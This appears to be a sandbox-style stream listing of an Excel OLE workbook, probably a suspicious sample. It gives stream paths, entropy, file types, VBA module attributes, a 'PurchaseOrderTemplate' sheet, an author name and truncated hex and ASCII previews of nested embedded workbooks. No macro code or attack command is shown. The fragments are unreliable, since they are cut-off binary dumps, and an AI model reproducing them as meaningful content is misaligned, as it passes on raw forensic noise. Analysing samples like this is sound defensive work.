      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - . 0
      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a2 bc 2d b4 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Attribute VB_Name = "ThisWorkbook"
      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
      Attribute VB_PredeclaredId = True
      Attribute VB_Exposed = True
      Attribute VB_TemplateDerived = False
      Attribute VB_Customizable = True
      

      General
      Stream Path:\x1CompObj
      CLSID:
      File Type:data
      Stream Size:114
      Entropy:4.25248375192737
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      General
      Stream Path:\x5DocumentSummaryInformation
      CLSID:
      File Type:data
      Stream Size:244
      Entropy:2.889430592781307
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
      General
      Stream Path:\x5SummaryInformation
      CLSID:
      File Type:data
      Stream Size:200
      Entropy:3.292068105701867
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . : ^ S O . . . . . . . . .
      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
      General
      Stream Path:MBD010681DB/\x1CompObj
      CLSID:
      File Type:data
      Stream Size:99
      Entropy:3.631242196770981
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      General
      Stream Path:MBD010681DB/Package
      CLSID:
      File Type:Microsoft Excel 2007+
      Stream Size:37036
      Entropy:7.720975169587741
      Base64 Encoded:True
      Data ASCII:P K . . . . . . . . . . ! . 8 . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 b7 a1 38 de e3 01 00 00 cb 09 00 00 13 00 e9 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 e5 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      General
      Stream Path:MBD010681DC/\x1CompObj
      CLSID:
      File Type:data
      Stream Size:114
      Entropy:4.25248375192737
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      General
      Stream Path:MBD010681DC/\x5DocumentSummaryInformation
      CLSID:
      File Type:data
      Stream Size:244
      Entropy:2.701136490257069
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
      General
      Stream Path:MBD010681DC/\x5SummaryInformation
      CLSID:
      File Type:data
      Stream Size:220
      Entropy:3.372234242231489
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . % ? ` * C . . . . . . . . .
      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00
      General
      Stream Path:MBD010681DC/MBD0018D4CE/\x1Ole
      CLSID:
      File Type:data
      Stream Size:20
      Entropy:0.5689955935892812
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . .
      Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      General
      Stream Path:MBD010681DC/MBD0018D4CE/\x3ObjInfo
      CLSID:
      File Type:data
      Stream Size:4
      Entropy:0.8112781244591328
      Base64 Encoded:False
      Data ASCII:. . . .
      Data Raw:00 00 03 00
      General
      Stream Path:MBD010681DC/MBD0018D4CE/Contents
      CLSID:
      File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
      Stream Size:197671
      Entropy:6.989042939766534
      Base64 Encoded:True
      Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      General
      Stream Path:MBD010681DC/MBD0068D442/\x1CompObj
      CLSID:
      File Type:data
      Stream Size:114
      Entropy:4.219515110876372
      Base64 Encoded:False
      Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      General
      Stream Path:MBD010681DC/MBD0068D442/Package
      CLSID:
      File Type:Microsoft Excel 2007+
      Stream Size:26243
      Entropy:7.635433729726103
      Base64 Encoded:True
      Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      General
      Stream Path:MBD010681DC/MBD007203CB/\x1CompObj
      CLSID:
      File Type:data
      Stream Size:114
      Entropy:4.25248375192737
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      General
      Stream Path:MBD010681DC/MBD007203CB/\x5DocumentSummaryInformation
      CLSID:
      File Type:data
      Stream Size:248
      Entropy:3.0523231150355867
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P u r c h a s e O r d e r T e m p l a t e . . . . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a2 00 00 00 02 00 00 00 e4 04 00 00
      General
      Stream Path:MBD010681DC/MBD007203CB/\x5SummaryInformation
      CLSID:
      File Type:data
      Stream Size:256
      Entropy:4.086306928392587
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . B r a t i s l a v M i l o j e v i c | E L M E D d . o . o . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . N ; . . @ . . . . . . . @ . . . . v @ n ) C . . . . . . . . .
      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 7c 00 00 00 12 00 00 00 8c 00 00 00 0b 00 00 00 a4 00 00 00 0c 00 00 00 b0 00 00 00 0d 00 00 00 bc 00 00 00 13 00 00 00 c8 00 00 00 02 00 00 00 e4 04 00 00
      General
      Stream Path:MBD010681DC/MBD007203CB/Workbook
      CLSID:
      File Type:Applesoft BASIC program data, first line number 16
      Stream Size:134792
      Entropy:7.974168320310173
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . Z i ^ . m . q l % . w " . x . Z q C b g i ' . h . . # . . . . . . . P . . . \\ . p . . 6 u ! l ( n y I T 5 W { L : 1 J . S . . . . 0 x . 3 . ` . X { ( / z 7 / . 8 x X g X # v . . [ d C y . . s . ] G 9 m . u . . . B . . . R a . . . . . . . = . . . L . . . O . . r 7 . v . . . " . . . . " _ K : . . . . . . . . . j # . . . . K . . . . . . . . = . . . " j ! ; . g . . @ . . . . . . . ^ " . . . 9 . . . . r . . . . . . . 1 . . . : . t . ? e . ) n S P x . b & 1
      Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 5a 69 5e 2e a6 e0 6d 97 16 71 6c a3 ef b8 25 05 77 88 22 87 ec d8 b3 78 17 a4 5a 71 43 ad a8 c2 62 67 69 b8 d9 e2 27 83 c8 df b8 f6 68 1b 05 23 e1 00 02 00 b0 04 c1 00 02 00 ef 50 e2 00 00 00 5c 00 70 00 13 36 75 21 6c 28 6e bd 95 81 f4 c7 79 fa 49 54 35 99 57 f1 85 8d fb f3 e2 7b 4c b1 ea 3a
      General
      Stream Path:MBD010681DC/MBD007203CB/_VBA_PROJECT_CUR/PROJECT
      CLSID:
      File Type:ASCII text, with CRLF line terminators
      Stream Size:468
      Entropy:5.269289820125323
      Base64 Encoded:True
      Data ASCII:I D = " { 1 9 C 9 4 3 8 D - F 0 7 5 - 4 2 6 8 - 9 E 6 E - 7 B 8 A E 6 6 D 5 A 0 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C D C F 3 A 0 A C A D 2 C E D 2 C E D 2 C E D 2 C E " . . D P B = " 9 9 9 B 6 E 9 3 6 F 9
      Data Raw:49 44 3d 22 7b 31 39 43 39 34 33 38 44 2d 46 30 37 35 2d 34 32 36 38 2d 39 45 36 45 2d 37 42 38 41 45 36 36 44 35 41 30 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
      General
      Stream Path:MBD010681DC/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm
      CLSID:
      File Type:data
      Stream Size:83
      Entropy:3.0672749060249043
      Base64 Encoded:False
      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . . .
      Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 00 00
      General
      Stream Path:MBD010681DC/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
      CLSID:
      File Type:data
      Stream Size:2486
      Entropy:3.9244127831265385
      Base64 Encoded:False
      Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
      Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
      General
      Stream Path:MBD010681DC/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir
      CLSID:
      File Type:data
      Stream Size:536
      Entropy:6.330646364694152
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . C W ] i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
      Data Raw:01 14 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 43 57 5d 69 12 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
      General
      Stream Path:MBD010681DC/MBD00726B69/\x1CompObj
      CLSID:
      File Type:data
      Stream Size:114
      Entropy:4.219515110876372
      Base64 Encoded:False
      Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      General
      Stream Path:MBD010681DC/MBD00726B69/Package
      CLSID:
      File Type:Microsoft Excel 2007+
      Stream Size:26242
      Entropy:7.635424485665502
      Base64 Encoded:True
      Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      General
      Stream Path:MBD010681DC/Workbook
      CLSID:
      File Type:Applesoft BASIC program data, first line number 16
      Stream Size:283872
      Entropy:7.743278150467805
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . H < l - 9 . . . . . . . X . @ . . . . . . . . . .
      Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
      General
      Stream Path:MBD010681DD/\x1CompObj
      CLSID:
      File Type:data
      Stream Size:99
      Entropy:3.631242196770981
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      General
      Stream Path:MBD010681DD/Package
      CLSID:
      File Type:Microsoft Excel 2007+
      Stream Size:45934
      Entropy:7.5587990853484195
      Base64 Encoded:True
      Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 8c e9 8c 8c 7e 01 00 00 8c 05 00 00 13 00 dc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      General
      Stream Path:MBD010681DE/\x1Ole
      CLSID:
      File Type:data
      Stream Size:560
      Entropy:5.607558056244155
      Base64 Encoded:False
